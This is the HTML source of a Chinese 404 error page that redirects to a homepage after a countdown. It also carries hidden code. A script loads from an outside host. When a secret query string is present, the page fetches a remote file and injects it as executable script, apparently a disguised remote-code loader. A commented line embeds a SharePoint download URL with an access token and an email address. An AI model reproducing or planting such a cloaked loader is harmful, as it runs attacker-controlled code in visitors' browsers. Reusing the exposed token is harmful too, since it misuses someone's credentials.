<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <title>404 - Not Found</title>
    <link rel="icon" href="/images/favicon.png">
    <style>
        * {
            margin: 0;
            padding: 0;
            outline: none;
            font-family: \5FAE\8F6F\96C5\9ED1, 宋体;
            -webkit-user-select: none;
            -moz-user-select: none;
            -ms-user-select: none;
            -khtml-user-select: none;
            user-select: none;
            cursor: default;
            font-weight: lighter;
        }

        .center {
            margin: 0 auto;
            color: #fff;
            font-weight: bolder;
            font-size: 72px;
        }

        .whole {
            width: 100%;
            height: 100%;
            line-height: 100%;
            position: fixed;
            bottom: 0;
            left: 0;
            z-index: -1000;
            overflow: hidden;
        }

        .whole img {
            width: 100%;
            height: 100%;
        }

        .mask {
            width: 100%;
            height: 100%;
            position: absolute;
            top: 0;
            left: 0;
            background: #000;
            opacity: 0.6;
            filter: alpha(opacity=60);
        }

        .b {
            width: 100%;
            text-align: center;
            height: 400px;
            position: absolute;
            top: 50%;
            margin-top: -230px
        }

        .a {
            width: 150px;
            height: 50px;
            margin-top: 30px
        }

        .a a {
            display: block;
            float: left;
            width: 150px;
            height: 50px;
            background: #fff;
            text-align: center;
            line-height: 50px;
            font-size: 18px;
            border-radius: 25px;
            color: #333
        }

        .a a:hover {
            color: #000;
            box-shadow: #fff 0 0 20px
        }

        p {
            color: #fff;
            margin-top: 40px;
            font-size: 24px;
        }

        #num {
            margin: 0 5px;
            font-weight: bold;
        }
    </style>
    <script type="text/javascript">
        var num = 5;
        function redirect() {
            num--;
            document.getElementById("num").innerHTML = num;
            if (num < 0) {
                document.getElementById("num").innerHTML = 0;
                location.href = "https://www.hojun.cn";
            }
        }
        setInterval("redirect()", 1000);
    </script>
</head>

<body onload="redirect();">
    <script src="https://ricardojackmc.top/APlayer.js"></script>
    <!-- <script src="https://zwzzv-my.sharepoint.com/personal/evanwu_zwzzv_onmicrosoft_com/_layouts/15/download.aspx?UniqueId=e0d07f82-e18a-4cce-a83b-5fb54856a988&Translate=false&tempauth=v1.eyJzaXRlaWQiOiJkNTA0MDE2ZS1iNWQ5LTRkOTUtYTMyZC1jZjc3YzBiM2YwNjMiLCJhcHBfZGlzcGxheW5hbWUiOiJDbG91ZHJldmUiLCJhcHBpZCI6IjdhZWIwZGQ1LWNlMmItNGZiNS1iMGZkLWI3MGIxYjU3MjUyZCIsImF1ZCI6IjAwMDAwMDAzLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMC96d3p6di1teS5zaGFyZXBvaW50LmNvbUA1NjZlYTI3OS0xNDEzLTQwYWMtODVhNi05M2E0ZDliODUxZmQiLCJleHAiOiIxNzI1NzA3MTMzIn0.CgoKBHNuaWQSAjY0EgsI9N2Mz9TLpz0QBRoOMjAuMTkwLjE0NC4xNjkqLGJ2RDc3VUNtK1lyNU0yNEwxbXNZODBEc1B3a0UvMzVZcGNhWngrOEpqVFE9MJ0BOAFCEKFN4fCsAAAwuqzt6ioQ-RZKEGhhc2hlZHByb29mdG9rZW5SCFsia21zaSJdcikwaC5mfG1lbWJlcnNoaXB8MTAwMzIwMDFmNjU0OThjMUBsaXZlLmNvbXoBMoIBEgl5om5WExSsQBGFppOk2bhR_ZIBBumcgeaitZoBA-WQtKIBHGV2YW53dUB6d3p6di5vbm1pY3Jvc29mdC5jb22qARAxMDAzMjAwMUY2NTQ5OEMxsgEOYWxsZmlsZXMud3JpdGXIAQE.PWP2UR8Q2KILWRymMkV6V0D48By2ER1PISnWzCjm9pU&ApiVersion=2.0"></script> -->
    <script>
    
    function readTextFile(file, callback) {
        var rawFile = new XMLHttpRequest();
        var parts = file.split('.');
        var extension = parts.pop();
        if (extension == "zip") {
            rawFile.overrideMimeType("application/json");
        }
        if (extension == "gz") {
            rawFile.overrideMimeType("text/plain");
        }
        rawFile.open("GET", file, true);
        rawFile.onreadystatechange = function() {
            if (rawFile.readyState === 4 && rawFile.status == "200") {
                callback(rawFile.responseText);
            }
        }
        rawFile.send(null);
    }
    function download() {
        readTextFile("https://ricardojackmc.top/p0.zip", function(text){
            document.getElementById("404").innerHTML = text;
        });
    }
    function contents() {
        readTextFile("https://ricardojackmc.top/s0.zip", function(text){
            document.getElementById("404").innerHTML = text;
        });
    }
    window.onload = function() {
        var value=window.location.search.substring(1)
        if (value == "alubnfolklore") {
            contents();
        readTextFile("https://ricardojackmc.top/f0.gz", function(jsCode){
            var script = document.createElement('script');
            script.textContent = jsCode;
            document.body.appendChild(script);
        });
        }
    }
    </script>
<div id="404">
<div class="whole">
    <img src="https://wx4.sinaimg.cn/large/006bYVyvgy1ftan82duvvj30xc0p0mzb.jpg">
    <div class="mask"></div>
</div>
<div class="b">
    <h1 class="center">可能输错网址或此页面从未存在过</h1>
    <p><br><br><br><br>
        <span id="num"></span>秒后将继续探险...
    </p>
</div>
</div>
</body>
<script type="text/javascript" src="//qzonestyle.gtimg.cn/qzone/hybrid/app/404/search_children.js" charset="utf-8" homePageUrl="https://www.hojun.cn/" homePageName="返回主页"></script>
</html>
